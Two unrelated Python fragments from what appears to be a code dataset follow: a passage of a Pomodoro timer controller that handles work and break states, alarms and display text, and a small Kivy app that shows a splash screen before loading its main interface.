self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
if not disable_sound:
self.__play_alarm_sound(ALARM_FINISH_PATH)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.BREAK
else:
self.status = PomodoroStatus.FINISHED_WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.WORK
if not disable_sound:
self.__play_alarm_sound(ALARM_START_PATH)
else:
self.status = PomodoroStatus.FINISHED_BREAK
def reset_timer(self) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK, PomodoroStatus.FINISHED_WORK):
database.insert_pomodoro(
self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.timer.start()
self.status = PomodoroStatus.WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK, PomodoroStatus.FINISHED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
self.timer.start()
self.status = PomodoroStatus.BREAK
def update_timer(self) -> None:
time_diff, timer_complete = self.timer.update()
if self.status == PomodoroStatus.WORK:
self.project_controller.add_todays_total_time(time_diff)
self.project_controller.current.add_time(time_diff, True)
if timer_complete:
self.finish_timer()
def toggle_start_stop(self) -> None:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
self.timer.start()
self.status = PomodoroStatus.WORK
self.__play_alarm_sound(ALARM_START_PATH)
elif self.status == PomodoroStatus.PAUSED_WORK:
self.timer.continue_()
self.status = PomodoroStatus.WORK
elif self.status == PomodoroStatus.FINISHED_WORK:
self.timer.start()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.PAUSED_BREAK:
self.timer.continue_()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.WORK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_WORK
elif self.status == PomodoroStatus.BREAK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_BREAK
def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None:
self.interval_settings = interval_settings
# Edit current timer settings without resetting
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
self.timer.interval = interval_settings.work_secs
else:
self.timer.interval = interval_settings.break_secs
def __play_alarm_sound(self, path) -> None:
curr_vol = self.audio_controller.get_volume()
audio_decr = 15
self.audio_controller.set_volume(max(curr_vol - audio_decr, 0))
alarm = audio_ap.AudioPlayer(path)
alarm.set_volume(curr_vol)
alarm.play()
# TODO: this needs to be async - wait for the alarm length
self.audio_controller.set_volume(curr_vol)
@property
def timer_display(self) -> str:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
return "START TIMER"
elif self.status == PomodoroStatus.WORK:
return f"BREAK IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.BREAK:
return f"POMODORO IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.PAUSED_WORK:
return f"PAUSED [WORK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.PAUSED_BREAK:
return f"PAUSED [BREAK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.FINISHED_WORK:
return "START BREAK"
| 7,033 | 2,251 |
from logging import root
from os import name
from kivy.animation import Animation
from kivy.clock import Clock
from kivy.lang import Builder
from widgets.loader import Loader
from kivy.uix.behaviors import button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.image import Image
from kivymd.app import MDApp
from kivy.uix.screenmanager import Screen, ScreenManager
from kivy.uix.button import Button
from screens.splash import SplashScreen
class MainApp(MDApp):
def __init__(self, **kwargs):
self.title = "Vitual Music"
self.icon='assets/icons/app_icon.jpeg'
super().__init__(**kwargs)
def build(self):
self.theme_cls.theme_style="Dark"
self.theme_cls.primary_palette ="Purple"
Clock.schedule_once(self.load_file, 5)
self.manager = ScreenManager()
splash_scr = SplashScreen(name="splash")
self.manager.add_widget(splash_scr)
self.root = self.manager
def load_file(self, *args):
a_pp = Builder.load_file("gui.kv")
main_scr = Screen(name="main")
main_scr.add_widget(a_pp)
self.root.add_widget(main_scr)
self.root.current = "main"
class Root(BoxLayout):
pass
if __name__ == "__main__":
MainApp().run()
"""
0.5,0.1,1,1
"""
| 1,324 | 456 |